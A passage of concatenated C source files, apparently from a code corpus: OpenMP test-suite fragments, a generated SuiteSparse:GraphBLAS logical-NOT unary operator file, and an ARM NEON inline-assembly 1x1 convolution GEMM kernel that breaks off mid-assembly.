size = omp_get_num_threads ();
data = (int *) malloc (size * sizeof (int));
}
}
srand (45);
for (iter = 0; iter < 100; iter++)
{
my_random = rand ();
#pragma omp parallel
{
int rank;
rank = omp_get_thread_num ();
crossmyvalue = data[rank] = my_random + rank;
}
#pragma omp parallel reduction(+:failed)
{
int rank;
rank = omp_get_thread_num ();
failed = failed + (crossmyvalue != data[rank]);
}
}
free (data);
return (known_sum == sum) && !failed;
} /* end of crosscheck_threadprivate */
|
omp_parallel_for.c | <ompts:test>
<ompts:testdescription>Test which checks the omp parallel for directive.</ompts:testdescription>
<ompts:ompversion>1.0</ompts:ompversion>
<ompts:directive>omp parallel for</ompts:directive>
<ompts:dependences></ompts:dependences>
<ompts:testcode>
#include "omp_testsuite.h"
#include <stdio.h>
int <ompts:testcode:functionname>omp_parallel_for</ompts:testcode:functionname>(FILE * logFile){
int i;
int data[LOOPCOUNT];
<ompts:check>#pragma omp parallel for</ompts:check>
for (i = 0; i < LOOPCOUNT; i++)
{
data[i] = i;
}
for (i = 0; i < LOOPCOUNT; i++)
{
if (data[i] != i) return 0;
}
return 1;
}
</ompts:testcode>
</ompts:test>
|
GB_unaryop__lnot_int64_int8.c | //------------------------------------------------------------------------------
// GB_unaryop: hard-coded functions for each built-in unary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2019, All Rights Reserved.
// http://suitesparse.com See GraphBLAS/Doc/License.txt for license.
//------------------------------------------------------------------------------
// If this file is in the Generated/ folder, do not edit it (auto-generated).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_control.h"
#include "GB_iterator.h"
#include "GB_unaryop__include.h"
// C=unop(A) is defined by the following types and operators:
// op(A) function: GB_unop__lnot_int64_int8
// op(A') function: GB_tran__lnot_int64_int8
// C type: int64_t
// A type: int8_t
// cast: int64_t cij = (int64_t) aij
// unaryop: cij = !(aij != 0)
#define GB_ATYPE \
int8_t
#define GB_CTYPE \
int64_t
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA) \
int8_t aij = Ax [pA]
#define GB_CX(p) Cx [p]
// unary operator
#define GB_OP(z, x) \
z = !(x != 0) ;
// casting
#define GB_CASTING(z, x) \
int64_t z = (int64_t) x ;
// cij = op (cast (aij))
#define GB_CAST_OP(pC,pA) \
{ \
/* aij = Ax [pA] */ \
GB_GETA (aij, Ax, pA) ; \
/* Cx [pC] = op (cast (aij)) */ \
GB_CASTING (x, aij) ; \
GB_OP (GB_CX (pC), x) ; \
}
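// Editorial illustration: GB_CAST_OP(p,p) expands, via the macros above, to
// int8_t aij = Ax [p] ;
// int64_t x = (int64_t) aij ;
// Cx [p] = !(x != 0) ;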
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_LNOT || GxB_NO_INT64 || GxB_NO_INT8)
//------------------------------------------------------------------------------
// Cx = op (cast (Ax)): apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_unop__lnot_int64_int8
(
int64_t *restrict Cx,
const int8_t *restrict Ax,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (int64_t p = 0 ; p < anz ; p++)
{
GB_CAST_OP (p, p) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = op (cast (A')): transpose, typecast, and apply a unary operator
//------------------------------------------------------------------------------
GrB_Info GB_tran__lnot_int64_int8
(
GrB_Matrix C,
const GrB_Matrix A,
int64_t **Rowcounts,
GBI_single_iterator Iter,
const int64_t *restrict A_slice,
int naslice
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#define GB_PHASE_2_OF_2
#include "GB_unaryop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
|
zq_cnn_convolution_gemm_nchwc_kernel1x1_neon_raw.h | #define __ARMV8 1
static void conv1x1s1_sgemm_transform_kernel_neon(const Mat& _kernel, Mat& kernel_tm, int inch, int outch)
{
const float* kernel = _kernel;
// interleave
#if __ARMV8
kernel_tm.create(4 * 8, inch / 4 + inch % 4, outch / 8 + (outch % 8) / 4 + outch % 4);
#else
kernel_tm.create(4 * 4, inch / 4 + inch % 4, outch / 4 + outch % 4);
#endif // __ARM_NEON && __ARMV8
int p = 0;
#if __ARMV8
for (; p + 7<outch; p += 8)
{
const float* kernel0 = kernel + (p + 0)*inch;
const float* kernel1 = kernel + (p + 1)*inch;
const float* kernel2 = kernel + (p + 2)*inch;
const float* kernel3 = kernel + (p + 3)*inch;
const float* kernel4 = kernel + (p + 4)*inch;
const float* kernel5 = kernel + (p + 5)*inch;
const float* kernel6 = kernel + (p + 6)*inch;
const float* kernel7 = kernel + (p + 7)*inch;
float* ktmp = kernel_tm.channel(p / 8);
for (int q = 0; q<inch; q++)
{
// kernel0...7 0
ktmp[0] = kernel0[0];
ktmp[1] = kernel1[0];
ktmp[2] = kernel2[0];
ktmp[3] = kernel3[0];
ktmp[4] = kernel4[0];
ktmp[5] = kernel5[0];
ktmp[6] = kernel6[0];
ktmp[7] = kernel7[0];
ktmp += 8;
kernel0 += 1;
kernel1 += 1;
kernel2 += 1;
kernel3 += 1;
kernel4 += 1;
kernel5 += 1;
kernel6 += 1;
kernel7 += 1;
}
}
#endif // __ARMV8
for (; p + 3<outch; p += 4)
{
const float* kernel0 = kernel + (p + 0)*inch;
const float* kernel1 = kernel + (p + 1)*inch;
const float* kernel2 = kernel + (p + 2)*inch;
const float* kernel3 = kernel + (p + 3)*inch;
#if __ARMV8
float* ktmp = kernel_tm.channel(p / 8 + (p % 8) / 4);
#else
float* ktmp = kernel_tm.channel(p / 4);
#endif // __ARMV8
for (int q = 0; q<inch; q++)
{
// kernel0...3 0
ktmp[0] = kernel0[0];
ktmp[1] = kernel1[0];
ktmp[2] = kernel2[0];
ktmp[3] = kernel3[0];
ktmp += 4;
kernel0 += 1;
kernel1 += 1;
kernel2 += 1;
kernel3 += 1;
}
}
for (; p<outch; p++)
{
const float* kernel0 = kernel + p*inch;
#if __ARMV8
float* ktmp = kernel_tm.channel(p / 8 + (p % 8) / 4 + p % 4);
#else
float* ktmp = kernel_tm.channel(p / 4 + p % 4);
#endif //__ARMV8
for (int q = 0; q<inch; q++)
{
ktmp[0] = kernel0[0];
ktmp++;
kernel0++;
}
}
}
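// Editorial note: after the transform above, each kernel_tm channel holds
// inch groups of interleaved weights; in the 8-wide case
// ktmp[q*8 + m] == kernel[(p+m)*inch + q] for m = 0..7,
// so the GEMM below streams weights for 8 output channels contiguously.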
static void conv1x1s1_sgemm_neon(const Mat& bottom_blob, Mat& top_blob, const Mat& kernel, const Mat& _bias, const Option& opt)
{
int w = bottom_blob.w;
int h = bottom_blob.h;
int inch = bottom_blob.c;
int outch = top_blob.c;
const int size = w * h;
const float* bias = _bias;
// interleave
Mat tmp(8 * 4, inch / 4 + inch % 4, size / 8 + (size % 8) / 4 + size % 4, 4u, opt.workspace_allocator);
{
int nn_size = size >> 3;
int remain_size_start = nn_size << 3;
#pragma omp parallel for num_threads(opt.num_threads)
for (int ii = 0; ii<nn_size; ii++)
{
int i = ii * 8;
const float* img0 = bottom_blob.channel(0);
img0 += i;
float* tmpptr = tmp.channel(i / 8);
for (int q = 0; q<inch; q++)
{
#if __ARMV8
vst1q_f32(tmpptr, vld1q_f32(img0));
vst1q_f32(tmpptr + 4, vld1q_f32(img0 + 4));
tmpptr += 8;
img0 += bottom_blob.cstep;
#else
asm volatile(
"pld [%0, #256] \n"
"vld1.f32 {d0-d3}, [%0 :128] \n"
"vst1.f32 {d0-d3}, [%1 :128]! \n"
: "=r"(img0), // %0
"=r"(tmpptr) // %1
: "0"(img0),
"1"(tmpptr)
: "memory", "q0", "q1"
);
img0 += bottom_blob.cstep;
#endif // __ARMV8
}
}
nn_size = (size - remain_size_start) >> 2;
#pragma omp parallel for num_threads(opt.num_threads)
for (int ii = 0; ii<nn_size; ii++)
{
int i = remain_size_start + ii * 4;
const float* img0 = bottom_blob.channel(0);
img0 += i;
float* tmpptr = tmp.channel(i / 8 + (i % 8) / 4);
for (int q = 0; q<inch; q++)
{
#if __ARMV8
vst1q_f32(tmpptr, vld1q_f32(img0));
tmpptr += 4;
img0 += bottom_blob.cstep;
#else
asm volatile(
"pld [%0, #128] \n"
"vld1.f32 {d0-d1}, [%0 :128] \n"
"vst1.f32 {d0-d1}, [%1 :128]! \n"
: "=r"(img0), // %0
"=r"(tmpptr) // %1
: "0"(img0),
"1"(tmpptr)
: "memory", "q0"
);
img0 += bottom_blob.cstep;
#endif // __ARMV8
}
}
remain_size_start += nn_size << 2;
#pragma omp parallel for num_threads(opt.num_threads)
for (int i = remain_size_start; i<size; i++)
{
const float* img0 = bottom_blob.channel(0);
img0 += i;
float* tmpptr = tmp.channel(i / 8 + (i % 8) / 4 + i % 4);
for (int q = 0; q<inch; q++)
{
tmpptr[0] = img0[0];
tmpptr++;
img0 += bottom_blob.cstep;
}
}
}
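// Editorial note: tmp mirrors the kernel interleave over spatial positions:
// 8-wide blocks land in channel i/8, 4-wide remainders in i/8 + (i%8)/4,
// and singles in i/8 + (i%8)/4 + i%4, matching the tmpptr channel indexing
// used by the GEMM loops below.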
int nn_outch = 0;
int remain_outch_start = 0;
#if __ARMV8
nn_outch = outch >> 3;
remain_outch_start = nn_outch << 3;
#pragma omp parallel for num_threads(opt.num_threads)
for (int pp = 0; pp<nn_outch; pp++)
{
int p = pp * 8;
float* outptr0 = top_blob.channel(p);
float* outptr1 = top_blob.channel(p + 1);
float* outptr2 = top_blob.channel(p + 2);
float* outptr3 = top_blob.channel(p + 3);
float* outptr4 = top_blob.channel(p + 4);
float* outptr5 = top_blob.channel(p + 5);
float* outptr6 = top_blob.channel(p + 6);
float* outptr7 = top_blob.channel(p + 7);
const float zeros[8] = { 0.f, 0.f, 0.f, 0.f, 0.f, 0.f, 0.f, 0.f };
const float* biasptr = bias ? bias + p : zeros;
int i = 0;
for (; i + 7<size; i += 8)
{
const float* tmpptr = tmp.channel(i / 8);
const float* kptr = kernel.channel(p / 8);
asm volatile(
"ld1 {v0.4s, v1.4s}, [%20] \n"
"dup v16.4s, v0.s[0] \n"
"dup v17.4s, v0.s[0] \n"
"dup v18.4s, v0.s[1] \n"
"dup v19.4s, v0.s[1] \n"
"dup v20.4s, v0.s[2] \n"
"dup v21.4s, v0.s[2] \n"
"dup v22.4s, v0.s[3] \n"
"dup v23.4s, v0.s[3] \n"
"dup v24.4s, v1.s[0] \n"
"dup v25.4s, v1.s[0] \n"
"dup v26.4s, v1.s[1] \n"
"dup v27.4s, v1.s[1] \n"
"dup v28.4s, v1.s[2] \n"
"dup v29.4s, v1.s[2] \n"
"dup v30.4s, v1.s[3] \n"
"dup v31.4s, v1.s[3] \n"
// inch loop
"lsr w4, %w21, #2 \n"// w4 = nn = inch >> 2
"cmp w4, #0 \n"
"beq 1f \n"
"0: \n"
"prfm pldl1keep, [%8, #512] \n"
"ld1 {v8.4s, v9.4s, v10.4s, v11.4s}, [%8], #64 \n"
"prfm pldl1keep, [%9, #512] \n"
"ld1 {v0.4s, v1.4s, v2.4s, v3.4s}, [%9], #64 \n"
"fmla v16.4s, v8.4s, v0.s[0] \n"
"fmla v18.4s, v8.4s, v0.s[1] \n"
"fmla v20.4s, v8.4s, v0.s[2] \n"
"fmla v22.4s, v8.4s, v0.s[3] \n"
"fmla v17.4s, v9.4s, v0.s[0] \n"
"fmla v19.4s, v9.4s, v0.s[1] \n"
"fmla v21.4s, v9.4s, v0.s[2] \n"
"fmla v23.4s, v9.4s, v0.s[3] \n"
"fmla v24.4s, v8.4s, v1.s[0] \n"
"fmla v26.4s, v8.4s, v1.s[1] \n"
"fmla v28.4s, v8.4s, v1.s[2] \n"
"fmla v30.4s, v8.4s, v1.s[3] \n"
"fmla v25.4s, v9.4s, v1.s[0] \n"
"fmla v27.4s, v9.4s, v1.s[1] \n"
"fmla v29.4s, v9.4s, v1.s[2] \n"
"fmla v31.4s, v9.4s, v1.s[3] \n"
"prfm pldl1keep, [%8, #512] \n"
"ld1 {v12.4s, v13.4s, v14.4s, v15.4s}, [%8], #64 \n"
"fmla v16.4s, v10.4s, v2.s[0] \n"
"fmla v18.4s, v10.4s, v2.s[1] \n"
"fmla v20.4s, v10.4s, v2.s[2] \n"
"fmla v22.4s, v10.4s, v2.s[3] \n"
"fmla v17.4s, v11.4s, v2.s[0] \n"
"fmla v19.4s, v11.4s, v2.s[1] \n"
"fmla v21.4s, v11.4s, v2.s[2] \n"
"fmla v23.4s, v11.4s, v2.s[3] \n"
"fmla v24.4s, v10.4s, v3.s[0] \n"
"fmla v26.4s, v10.4s, v3.s[1] \n"
"fmla v28.4s, v10.4s, v3.s[2] \n"
"fmla v30.4s, v10.4s, v3.s[3] \n"
"fmla v25.4s, v11.4s, v3.s[0] \n"
"fmla v27.4s, v11.4s, v3.s[1] \n"
"fmla v29.4s, v11.4s, v3.s[2] \n"
"fmla v31.4s, v11.4s, v3.s[3] \n"
"prfm pldl1keep, [%9, #512] \n"
"ld1 {v4.4s, v5.4s, v6.4s, v7.4s}, [%9], #64 \n"
"fmla v16.4s, v12.4s, v4.s[0] \n"
"fmla v18.4s, v12.4s, v4.s[1] \n"
"fmla v20.4s, v12.4s, v4.s[2] \n"
"fmla v22.4s, v12.4s, v4.s[3] \n"
"fmla v17.4s, v13.4s, v4.s[0] \n"
"fmla v19.4s, v13.4s, v4.s[1] \n"
"fmla v21.4s, v13.4s, v4.s[2] \n"
"fmla v23.4s, v13.4s, v4.s[3] \n"
"fmla v24.4s, v12.4s, v5.s[0] \n"
"fmla v26.4s, v12.4s, v5.s[1] \n"
"fmla v28.4s, v12.4s, v5.s[2] \n"
"fmla v30.4s, v12.4s, v5.s[3] \n"
"fmla v25.4s, v13.4s, v5.s[0] \n"
"fmla v27.4s, v13.4s, v5.s[1] \n"
"fmla v29.4s, v13.4s, v5.s[2] \n"
"fmla v31.4s, v13.4s, v5.s[3] \n"
"subs w4, w4, #1 \n"
"fmla v16.4s, v14.4s, v6.s[0] \n"
"fmla v18.4s, v14.4s, v6.s[1] \n"
"fmla v20.4s, v14.4s, v6.s[2] \n"
"fmla v22.4s, v14.4s, v6.s[3] \n"
"fmla v17.4s, v15.4s, v6.s[0] \n"
"fmla v19.4s, v15.4s, v6.s[1] \n"
"fmla v21.4s, v15.4s, v6.s[2] \n"
"fmla v23.4s, v15.4s, v6.s[3] \n"
"fmla v24.4s, v14.4s, v7.s[0] \n"
"fmla v26.4s, v14.4s, v7.s[1] \n"
"fmla v28.4s, v14.4s, v7.s[2] \n"
"fmla v30.4s, v14.4s, v7.s[3] \n"
"fmla v25.4s, v15.4s, v7.s[0] \n"
"fmla v27.4s, v15.4s, v7.s[1] \n"
"fmla v29.4s, v15.4s, v7.s[2] \n"
"fmla v31.4s, v15.4s, v7.s[3] \n"
"bne 0b \n"
"1: \n"
// remain loop
"and w4, %w21, #3 \n"// w4 = remain = inch & 3;
"cmp w4, #0 \n"
"beq 3f \n"
"2: \n"
"prfm pldl1keep, [%8, #256] \n"
"ld1 {v8.4s, v9.4s}, [%8], #32 \n"
"prfm pldl1keep, [%9, #256] \n"
"ld1 {v0.4s, v1.4s}, [%9], #32 \n"
"fmla v16.4s, v8.4s, v0.s[0] \n"
"fmla v18.4s, v8.4s, v0.s[1] \n"
"fmla v20.4s, v8.4s, v0.s[2] \n"
"fmla v22.4s, v8.4s, v0.s[3] \n"
"fmla v17.4s, v9.4s, v0.s[0] \n"
"fmla v19.4s, v9.4s, v0.s[1] \n"
"fmla v21.4s, v9.4s, v0.s[2] \n"
"fmla v23.4s, v9.4s, v0.s[3] \n"
"subs w4, w4, #1 \n"
"fmla v24.4s, v8.4s, v1.s[0] \n"
"fmla v26.4s, v8.4s, v1.s[1] \n"
"fmla v28.4s, v8.4s, v1.s[2] \n"
"fmla v30.4s, v8.4s, v1.s[3] \n"
"fmla v25.4s, v9.4s, v1.s[0] \n"
"fmla v27.4s, v9.4s, v1.s[1] \n"
"fmla v29.4s, v9.4s, v1.s[2] \n"
"fmla v31.4s, v9.4s, v1.s[3] \n"
"bne 2b \n"
"3: \n"
"st1 {v16.4s, v17.4s}, [%0], #32 \n"
"st1 {v18.4s, v19.4s}, [%1], #32 \n"
"st1 {v20.4s, v21.4s}, [%2], #32 \n"
"st1 {v22.4s, v23.4s}, [%3], #32 \n"
"st1 {v24.4s, v25.4s}, [%4], #32 \n"
"st1 {v26.4s, v27.4s}, [%5], #32 \n"
"st1 {v28.4s, v29.4s}, [%6], #32 \n"
"st1 {v30.4s, v31.4s}, [%7], #32 \n"
: "=r"(outptr0), // %0
"=r"(outptr1), // %1
"=r"(outptr2), // %2
"=r"(outptr3), // %3
"=r"(outptr4), // %4
"=r"(outptr5), // %5
"=r"(outptr6), // %6
"=r"(outptr7), // %7
"=r"(tmpptr), // %8
"=r"(kptr) // %9
: "0"(outptr0),
"1"(outptr1),
"2"(outptr2),
"3"(outptr3),
"4"(outptr4),
"5"(outptr5),
"6"(outptr6),
"7"(outptr7),
"8"(tmpptr),
"9"(kptr),
"r"(biasptr), // %20
"r"(inch) // %21
: "cc", "memory", "x4", "v0", "v1", "v2", "v3", "v4", "v5", "v6", "v7", "v8", "v9", "v10", "v11", "v12", "v13", "v14", "v15", "v16", "v17", "v18", "v19", "v20", "v21", "v22", "v23", "v24", "v25", "v26", "v27", "v28", "v29", "v30", "v31"
);
}
for (; i + 3<size; i += 4)
{
const float* tmpptr = tmp.channel(i / 8 + (i % 8) / 4);
const float* kptr = kernel.channel(p / 8);
asm volatile(
"ld1 {v0.4s, v1.4s}, [%20] \n"
"dup v16.4s, v0.s[0] \n"
"dup v17.4s, v0.s[1] \n"
"dup v18.4s, v0.s[2] \n"
"dup v19.4s, v0.s[3] \n"
"dup v20.4s, v1.s[0] \n"
"dup v21.4s, v1.s[1] \n"
"dup v22.4s, v1.s[2] \n"
"dup v23.4s, v1.s[3] \n"
// inch loop
"lsr w4, %w21, #2 \n"// w4 = nn = inch >> 2
"cmp w4, #0 \n"
"beq 1f \n"
"0: \n"
"prfm pldl1keep, [%8, #512] \n"
"ld1 {v8.4s, v9.4s, v10.4s, v11.4s}, [%8], #64 \n"
"prfm pldl1keep, [%9, #512] \n"
"ld1 {v0.4s, v1.4s, v2.4s, v3.4s}, [%9], #64 \n"
"fmla v16.4s, v8.4s, v0.s[0] \n"
"fmla v17.4s, v8.4s, v0.s[1] \n"
"fmla v18.4s, v8.4s, v0.s[2] \n"
"fmla v19.4s, v8.4s, v0.s[3] \n"
"fmla v20.4s, v8.4s, v1.s[0] \n"
"fmla v21.4s, v8.4s, v1.s[1] \n"
"fmla v22.4s, v8.4s, v1.s[2] \n"
"fmla v23.4s, v8.4s, v1.s[3] \n"
"prfm pldl1keep, [%9, #512] \n"
"ld1 {v4.4s, v5.4s, v6.4s, v7.4s}, [%9], #64 \n"
"fmla v16.4s, v9.4s, v2.s[0] \n"
"fmla v17.4s, v9.4s, v2.s[1] \n"
"fmla v18.4s, v9.4s, v2.s[2] \n"
"fmla v19.4s, v9.4s, v2.s[3] \n"
"fmla v20.4s, v9.4s, v3.s[0] \n"
"fmla v21.4s, v9.4s, v3.s[1] \n"
"fmla v22.4s, v9.4s, v3.s[2] \n"
"fmla v23.4s, v9.4s, v3.s[3] \n"
"subs w4, w4, #1 \n"
"fmla v16.4s, v10.4s, v4.s[0] \n"
"fmla v17.4s, v10.4s, v4.s[1] \n"
"fmla v18.4s, v10.4s, v4.s[2] \n"
"fmla v19.4s, v10.4s, v4.s[3] \n"
"fmla v20.4s, v10.4s, v5.s[0] \n"
"fmla v21.4s, v10.4s, v5.s[1] \n"
"fmla v22.4s, v10.4s, v5.s[2] \n"
"fmla v23.4s, v10.4s, v5.s[3] \n"
"fmla v16.4s, v11.4s, v6.s[0] \n"
"fmla v17.4s, v11.4s, v6.s[1] \n"
"fmla v18.4s, v11.4s, v6.s[2] \n"
"fmla v19.4s, v11.4s, v6.s[3] \n"
"fmla v20.4s, v11.4s, v7.s[0] \n"
"fmla v21.4s, v11.4s, v7.s[1] \n"
"fmla v22.4s, v11.4s, v7.s[2] \n"
"fmla v23.4s, v11.4s, v7.s[3] \n"
"bne 0b \n"
"1: \n"
// remain loop
"and w4, %w21, #3 \n"// w4 = remain = inch & 3;
"cmp w4, #0 \n"
"beq 3f \n"
"2: \n"
"prfm pldl1keep, [%8, #128] \n"
"ld1 {v8.4s}, [%8], #16 \n"
"prfm pldl1keep, [%9, #256] \n"
"ld1 {v0.4s, v1.4s}, [%9], #32 \n"
"fmla v16.4s, v8.4s, v0.s[0] \n"
"fmla v17.4s, v8.4s, v0.s[1] \n"
"fmla v18.4s, v8.4s, v0.s[2] \n"
"fmla v19.4s, v8.4s, v0.s[3] \n"
"subs w4, w4, #1 \n"
"fmla v20.4s, v8.4s, v1.s[0] \n"
"fmla v21.4s, v8.4s, v1.s[1] \n"
"fmla v22.4s, v8.4s, v1.s[2] \n"
"fmla v23.4s, v8.4s, v1.s[3] \n"
"bne 2b \n"
"3: \n"
"st1 {v16.4s}, [%0], #16 \n"
"st1 {v17.4s}, [%1], #16 \n"
"st1 {v18.4s}, [%2], #16 \n"
"st1 {v19.4s}, [%3], #16 \n"
"st1 {v20.4s}, [%4], #16 \n"
"st1 {v21.4s}, [%5], #16 \n"
"st1 {v22.4s}, [%6], #16 \n"
"st1 {v23.4s}, [%7], #16 \n"
: "=r"(outptr0), // %0
"=r"(outptr1), // %1
"=r"(outptr2), // %2
"=r"(outptr3), // %3
"=r"(outptr4), // %4
"=r"(outptr5), // %5
"=r"(outptr6), // %6
"=r"(outptr7), // %7
"=r"(tmpptr), // %8
"=r"(kptr) // %9
: "0"(outptr0),
"1"(outptr1),
"2"(outptr2),
"3"(outptr3),
"4"(outptr4),
"5"(outptr5),
"6"(outptr6),
"7"(outptr7),
"8"(tmpptr),
"9"(kptr),
"r"(biasptr), // %20
"r"(inch) // %21
: "cc", "memory", "x4", "v0", "v1", "v2", "v3", "v4", "v5", "v6", "v7", "v8", "v9", "v10", "v11", "v16", "v17", "v18", "v19", "v20", "v21", "v22", "v23"
);
}
for (; i<size; i++)
{
const float* tmpptr = tmp.channel(i / 8 + (i % 8) / 4 + i % 4);
const float* kptr = kernel.channel(p / 8);
asm volatile(
"ld1 {v24.4s, v25.4s}, [%20] \n"
// inch loop
"lsr w4, %w21, #2 \n"// w4 = nn = inch >> 2
"cmp w4, #0 \n"
"beq 1f \n"
"eor v16.16b, v16.16b, v16.16b \n"
"eor v17.16b, v17.16b, v17.16b \n"
"eor v18.16b, v18.16b, v18.16b \n"
"eor v19.16b, v19.16b, v19.16b \n"
"eor v20.16b, v20.16b, v20.16b \n"
"eor v21.16b, v21.16b, v21.16b \n"
"eor v22.16b, v22.16b, v22.16b \n"
"eor v23.16b, v23.16b, v23.16b \n"
"0: \n"
"prfm pldl1keep, [%8, #128] \n"
"ld1 {v8.4s}, [%8], #16 \n"
"prfm pldl1keep, [%9, #512] \n"
"ld1 {v0.4s, v1.4s, v2.4s, v3.4s}, [%9], #64 \n"
"fmla v16.4s, v0.4s, v8.s[0] \n"
"fmla v17.4s, v1.4s, v8.s[0] \n"
"fmla v18.4s, v2.4s, v8.s[1] \n"
"fmla v19.4s, v3.4s, v8.s[1] \n"
"prfm pldl1keep, [%9, #512] \n"
"ld1 {v4.4s, v5.4s, v6.4s, v7.4s}, [%9], #64 \n"
"subs w4, w4, #1 \n"
"fmla v20.4s, v4.4s, v8.s[2] \n"
"fmla v21.4s, v5.4s, v8.s[2] \n"
"fmla v22.4s, v6.4s, v8.s[3] \n"
"fmla v23.4s, v7.4s, v8.s[3] \n"
"bne 0b \n"
"fadd v16.4s, v16.4s, v18.4s \n"
"fadd v17.4s, v17.4s, v19.4s \n"
"fadd v20.4s, v20.4s, v22.4s \n"
"fadd v21.4s, v21.4s, v23.4s \n"
"fadd v16.4s, v16.4s, v20.4s \n"
"fadd v17.4s, v17.4s, v21.4s \n"
"fadd v24.4s, v24.4s, v16.4s \n"
"fadd v25.4s, v25.4s, v17.4s \n"
"1: \n"
// remain loop
"and w4, %w21, #3 \n"// w4 = remain = inch & 3;
"cmp w4, #0 \n"
"beq 3f \n"
"2: \n"
"prfm pldl1keep, [%8, #32] \n"
"ld1r {v8.4s}, [%8], #4 \n"
"prfm pldl1keep, [%9, #256] \n"
"ld1 {v0.4s, v1.4s}, [%9], #32 \n"
"subs w4, w4, #1 \n"
"fmla v24.4s, v8.4s, v0.4s \n"
"fmla v25.4s, v8.4s, v1.4s \n"
"bne 2b \n"
"3: \n"
"st1 {v24.s}[0],[%0], #4 \n"
"st1 {v24.s}[1],[%1], #4 \n"
"st1 {v24.s}[2],[%2], #4 \n"
"st1 {v24.s}[3],[%3], #4 \n"
"st1 {v25.s}[0],[%4], #4 \n"
"st1 {v25.s}[1],[%5], #4 \n"
"st1 {v25.s}[2],[%6], #4 \n"
"st1 {v25.s}[3],[%7], #4 \n"
: "=r"(outptr0), // %0
"=r"(outptr1), // %1
"=r"(outptr2), // %2
"=r"(outptr3), // %3
"=r"(outptr4), // %4
"=r"(outptr5), // %5
"=r"(outptr6), // %6
"=r"(outptr7), // %7
"=r"(tmpptr), // %8
"=r"(kptr) // %9
: "0"(outptr0),
"1"(outptr1),
"2"(outptr2),
"3"(outptr3),
"4"(outptr4),
"5"(outptr5),
"6"(outptr6),
"7"(outptr7),
"8"(tmpptr),
"9"(kptr),
"r"(biasptr), // %20
"r"(inch) // %21
: "cc", "memory", "x4", "v0", "v1", "v2", "v3", "v4", "v5", "v6", "v7", "v8", "v9", "v10", "v11", "v16", "v17", "v18", "v19", "v20", "v21", "v22", "v23", "v24", "v25"
);
}
}
#endif // __ARMV8
nn_outch = (outch - remain_outch_start) >> 2;
#pragma omp parallel for num_threads(opt.num_threads)
for (int pp = 0; pp<nn_outch; pp++)
{
int p = remain_outch_start + pp * 4;
float* outptr0 = top_blob.channel(p);
float* outptr1 = top_blob.channel(p + 1);
float* outptr2 = top_blob.channel(p + 2);
float* outptr3 = top_blob.channel(p + 3);
const float zeros[4] = { 0.f, 0.f, 0.f, 0.f };
const float* biasptr = bias ? bias + p : zeros;
int i = 0;
for (; i + 7<size; i += 8)
{
const float* tmpptr = tmp.channel(i / 8);
#if __ARMV8
const float* kptr = kernel.channel(p / 8 + (p % 8) / 4);
#else
const float* kptr = kernel.channel(p / 4);
#endif // __ARMV8
#if __ARMV8
asm volatile(
"ld1 {v0.4s}, [%12] \n"
"dup v8.4s, v0.s[0] \n"
"dup v9.4s, v0.s[0] \n"
"dup v10.4s, v0.s[1] \n"
"dup v11.4s, v0.s[1] \n"
"dup v12.4s, v0.s[2] \n"
"dup v13.4s, v0.s[2] \n"
"dup v14.4s, v0.s[3] \n"
"dup v15.4s, v0.s[3] \n"
// inch loop
"lsr w4, %w13, #2 \n"// w4 = nn = inch >> 2
"cmp w4, #0 \n"
"beq 1f \n"
"0: \n"
"prfm pldl1keep, [%4, #512] \n"
"ld1 {v4.4s, v5.4s, v6.4s, v7.4s}, [%4], #64 \n"
"prfm pldl1keep, [%5, #512] \n"
"ld1 {v0.4s, v1.4s, v2.4s, v3.4s}, [%5], #64 \n"
"fmla v8.4s, v4.4s, v0.s[0] \n"
"fmla v10.4s, v4.4s, v0.s[1] \n"
"fmla v12.4s, v4.4s, v0.s[2] \n"
"fmla v14.4s, v4.4s, v0.s[3] \n"
"fmla v9.4s, v5.4s, v0.s[0] \n"
"fmla v11.4s, v5.4s, v0.s[1] \n"
"fmla v13.4s, v5.4s, v0.s[2] \n"
"fmla v15.4s, v5.4s, v0.s[3] \n"
"prfm pldl1keep, [%4, #512] \n"
"ld1 {v16.4s, v17.4s, v18.4s, v19.4s}, [%4], #64 \n"
"fmla v8.4s, v6.4s, v1.s[0] \n"
"fmla v10.4s, v6.4s, v1.s[1] \n"
"fmla v12.4s, v6.4s, v1.s[2] \n"
"fmla v14.4s, v6.4s, v1.s[3] \n"
"fmla v9.4s, v7.4s, v1.s[0] \n"
"fmla v11.4s, v7.4s, v1.s[1] \n"
"fmla v13.4s, v7.4s, v1.s[2] \n"
"fmla v15.4s, v7.4s, v1.s[3] \n"
"subs w4, w4, #1 \n"
"fmla v8.4s, v16.4s, v2.s[0] \n"
"fmla v10.4s, v16.4s, v2.s[1] \n"
"fmla v12.4s, v16.4s, v2.s[2] \n"
"fmla v14.4s, v16.4s, v2.s[3] \n"
"fmla v9.4s, v17.4s, v2.s[0] \n"
"fmla v11.4s, v17.4s, v2.s[1] \n"
"fmla v13.4s, v17.4s, v2.s[2] \n"
"fmla v15.4s, v17.4s, v2.s[3] \n"
"fmla v8.4s, v18.4s, v3.s[0] \n"
"fmla v10.4s, v18.4s, v3.s[1] \n"
"fmla v12.4s, v18.4s, v3.s[2] \n"
"fmla v14.4s, v18.4s, v3.s[3] \n"
"fmla v9.4s, v19.4s, v3.s[0] \n"
"fmla v11.4s, v19.4s, v3.s[1] \n"
"fmla v13.4s, v19.4s, v3.s[2] \n"
"fmla v15.4s, v19.4s, v3.s[3] \n"
"bne 0b \n"
"1: \n"
// remain loop
"and w4, %w13, #3 \n"// w4 = remain = inch & 3;
"cmp w4, #0 \n"
"beq 3f \n"
"2: \n"
"prfm pldl1keep, [%4, #256] \n"
"ld1 {v4.4s, v5.4s}, [%4], #32 \n"
"prfm pldl1keep, [%5, #128] \n"
"ld1 {v0.4s}, [%5], #16 \n"
"fmla v8.4s, v4.4s, v0.s[0] \n"
"fmla v10.4s, v4.4s, v0.s[1] \n"
"fmla v12.4s, v4.4s, v0.s[2] \n"
"fmla v14.4s, v4.4s, v0.s[3] \n"
